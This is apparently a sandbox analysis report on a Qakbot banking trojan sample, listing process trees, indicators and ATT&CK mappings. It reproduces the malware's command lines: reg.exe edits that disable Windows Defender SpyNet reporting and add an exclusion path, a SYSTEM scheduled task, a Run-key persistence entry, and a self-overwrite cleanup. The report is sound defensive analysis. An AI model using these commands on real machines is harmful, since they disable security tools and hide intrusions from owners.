qakbot | 2ada31879ae7419da5f19095e6a086938475e97f8b022fe24bf25208778eb850

General

Target

444444.exe
Sample

200127-ppe7zc98ka
SHA256

2ada31879ae7419da5f19095e6a086938475e97f8b022fe24bf25208778eb850

Score

10^/10

evasion trojan spreading banker stealer qakbot persistence

Malware Config

Signatures

Executes dropped EXE 4 IoCs

Processes:

lvmaa.exelvmaa.exelvmaa.exelvmaa.exe

pid process

1096 lvmaa.exe
1916 lvmaa.exe
1964 lvmaa.exe
188 lvmaa.exe
Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

lvmaa.exe

pid process

1096 lvmaa.exe
Runs ping.exe 1 TTPs 1 IoCs
evasion spreading

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

1068 PING.EXE
Suspicious behavior: EnumeratesProcesses 8 IoCs

Processes:

444444.exe444444.exelvmaa.exelvmaa.exeexplorer.exe444444.exelvmaa.exelvmaa.exe

pid process

1448 444444.exe
1596 444444.exe
1096 lvmaa.exe
1916 lvmaa.exe
1996 explorer.exe
768 444444.exe
1964 lvmaa.exe
188 lvmaa.exe
Loads dropped DLL 1 IoCs

Processes:

444444.exe

pid process

1448 444444.exe

pid	process
1096	lvmaa.exe
1916	lvmaa.exe
1964	lvmaa.exe
188	lvmaa.exe

pid	process
1096	lvmaa.exe

pid	process
1068	PING.EXE

pid	process
1448	444444.exe
1596	444444.exe
1096	lvmaa.exe
1916	lvmaa.exe
1996	explorer.exe
768	444444.exe
1964	lvmaa.exe
188	lvmaa.exe

pid	process
1448	444444.exe

Turn off Windows Defender SpyNet reporting 6 IoCs

Processes:

reg.exereg.exereg.exereg.exereg.exereg.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Spynet\SpyNetReporting = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Spynet\SubmitSamplesConsent = "2"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Microsoft AntiMalware\SpyNet\SpyNetReporting = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Microsoft AntiMalware\SpyNet\SubmitSamplesConsent = "2"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\SpyNet\SpyNetReporting = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\SpyNet\SubmitSamplesConsent = "2"	reg.exe

Windows security bypass 2 TTPs 2 IoCs

evasion trojan

Disabling Security Tools

T1089

Modify Registry

T1112

Processes:

reg.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Roaming\Microsoft\Shsfzaefg = "0"	reg.exe

Qakbot/Qbot
Qbot or Qakbot is a sophisticated worm with banking capabilities
trojan banker stealer qakbot

Adds Run entry to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

explorer.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000\Software\Microsoft\Windows\CurrentVersion\Run\ukjluy = "\"C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Shsfzaefg\\lvmaa.exe\""	explorer.exe

Suspicious use of WriteProcessMemory 19 IoCs

Processes:

444444.exelvmaa.exetaskeng.exe444444.exelvmaa.exe

description	pid	process	target process
PID 1448 wrote to memory of 1596	1448	444444.exe	444444.exe
PID 1448 wrote to memory of 1096	1448	444444.exe	lvmaa.exe
PID 1096 wrote to memory of 1916	1096	lvmaa.exe	lvmaa.exe
PID 1448 wrote to memory of 1824	1448	444444.exe	schtasks.exe
PID 1096 wrote to memory of 1996	1096	lvmaa.exe	explorer.exe
PID 1264 wrote to memory of 768	1264	taskeng.exe	444444.exe
PID 768 wrote to memory of 1752	768	444444.exe	reg.exe
PID 768 wrote to memory of 1660	768	444444.exe	reg.exe
PID 768 wrote to memory of 1788	768	444444.exe	reg.exe
PID 768 wrote to memory of 608	768	444444.exe	reg.exe
PID 768 wrote to memory of 568	768	444444.exe	reg.exe
PID 768 wrote to memory of 1132	768	444444.exe	reg.exe
PID 768 wrote to memory of 1884	768	444444.exe	reg.exe
PID 768 wrote to memory of 548	768	444444.exe	reg.exe
PID 768 wrote to memory of 684	768	444444.exe	reg.exe
PID 768 wrote to memory of 1964	768	444444.exe	lvmaa.exe
PID 1964 wrote to memory of 188	1964	lvmaa.exe	lvmaa.exe
PID 768 wrote to memory of 1184	768	444444.exe	cmd.exe
PID 768 wrote to memory of 1908	768	444444.exe	schtasks.exe

Windows security modification 2 TTPs 6 IoCs

evasion trojan

Disabling Security Tools

T1089

Modify Registry

T1112

Processes:

reg.exereg.exereg.exereg.exereg.exereg.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Microsoft AntiMalware\SpyNet	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Microsoft AntiMalware\SpyNet	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\SpyNet	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\SpyNet	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Spynet	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Spynet	reg.exe

C:\Users\Admin\AppData\Local\Temp\444444.exe
"C:\Users\Admin\AppData\Local\Temp\444444.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1448

C:\Users\Admin\AppData\Local\Temp\444444.exe
C:\Users\Admin\AppData\Local\Temp\444444.exe /C
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1596

C:\Users\Admin\AppData\Roaming\Microsoft\Shsfzaefg\lvmaa.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Shsfzaefg\lvmaa.exe
2⤵
- Executes dropped EXE
- Suspicious behavior: MapViewOfSection
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1096

C:\Users\Admin\AppData\Roaming\Microsoft\Shsfzaefg\lvmaa.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Shsfzaefg\lvmaa.exe /C
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1916

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
3⤵
- Suspicious behavior: EnumeratesProcesses
- Adds Run entry to start application
PID:1996

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Create /RU "NT AUTHORITY\SYSTEM" /tn wkaaitss /tr "\"C:\Users\Admin\AppData\Local\Temp\444444.exe\" /I wkaaitss" /SC ONCE /Z /ST 18:37 /ET 18:49
2⤵
PID:1824

C:\Windows\system32\taskeng.exe
taskeng.exe {D2250D74-C72A-4B19-998D-EF6BE86000CC} S-1-5-18:NT AUTHORITY\System:Service:
1⤵
- Suspicious use of WriteProcessMemory
PID:1264

C:\Users\Admin\AppData\Local\Temp\444444.exe
C:\Users\Admin\AppData\Local\Temp\444444.exe /I wkaaitss
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:768

C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe ADD "HKLM\SOFTWARE\Microsoft\Microsoft AntiMalware\SpyNet" /f /t REG_DWORD /v "SpyNetReporting" /d "0"
3⤵
- Turn off Windows Defender SpyNet reporting
- Windows security modification
PID:1752

C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe ADD "HKLM\SOFTWARE\Microsoft\Microsoft AntiMalware\SpyNet" /f /t REG_DWORD /v "SubmitSamplesConsent" /d "2"
3⤵
- Turn off Windows Defender SpyNet reporting
- Windows security modification
PID:1660

C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe ADD "HKLM\SOFTWARE\Wow6432Node\Microsoft AntiMalware\SpyNet" /f /t REG_DWORD /v "SpyNetReporting" /d "0"
3⤵
PID:1788

C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe ADD "HKLM\SOFTWARE\Wow6432Node\Microsoft AntiMalware\SpyNet" /f /t REG_DWORD /v "SubmitSamplesConsent" /d "2"
3⤵
PID:608

C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\SpyNet" /f /t REG_DWORD /v "SpyNetReporting" /d "0"
3⤵
- Turn off Windows Defender SpyNet reporting
- Windows security modification
PID:568

C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\SpyNet" /f /t REG_DWORD /v "SubmitSamplesConsent" /d "2"
3⤵
- Turn off Windows Defender SpyNet reporting
- Windows security modification
PID:1132

C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe ADD "HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Spynet" /f /t REG_DWORD /v "SpyNetReporting" /d "0"
3⤵
- Turn off Windows Defender SpyNet reporting
- Windows security modification
PID:1884

C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe ADD "HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Spynet" /f /t REG_DWORD /v "SubmitSamplesConsent" /d "2"
3⤵
- Turn off Windows Defender SpyNet reporting
- Windows security modification
PID:548

C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /t REG_DWORD /v "C:\Users\Admin\AppData\Roaming\Microsoft\Shsfzaefg" /d "0"
3⤵
- Windows security bypass
PID:684

C:\Users\Admin\AppData\Roaming\Microsoft\Shsfzaefg\lvmaa.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Shsfzaefg\lvmaa.exe
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1964

C:\Users\Admin\AppData\Roaming\Microsoft\Shsfzaefg\lvmaa.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Shsfzaefg\lvmaa.exe /C
4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:188

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ping.exe -n 6 127.0.0.1 & type "C:\Windows\System32\calc.exe" > "C:\Users\Admin\AppData\Local\Temp\444444.exe"
3⤵
PID:1184

C:\Windows\system32\PING.EXE
ping.exe -n 6 127.0.0.1
4⤵
- Runs ping.exe
PID:1068

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /DELETE /F /TN wkaaitss
3⤵
PID:1908

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

1

T1060

Privilege Escalation

Defense Evasion

Disabling Security Tools

2

T1089

Modify Registry

3

T1112

Credential Access

Discovery

Remote System Discovery

1

T1018

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Shsfzaefg\lvmaa.dat

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Shsfzaefg\lvmaa.exe

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Shsfzaefg\lvmaa.exe

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Shsfzaefg\lvmaa.exe

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Shsfzaefg\lvmaa.exe

Download Submit
\Users\Admin\AppData\Roaming\Microsoft\Shsfzaefg\lvmaa.exe

Download Submit
memory/188-9-0x0000000002300000-0x0000000002311000-memory.dmp

Filesize
68KB

Download
memory/1096-5-0x0000000000470000-0x00000000004AB000-memory.dmp

Filesize
236KB

Download
memory/1596-0-0x00000000022D0000-0x00000000022E1000-memory.dmp

Filesize
68KB

Download
memory/1916-4-0x00000000022D0000-0x00000000022E1000-memory.dmp

Filesize
68KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads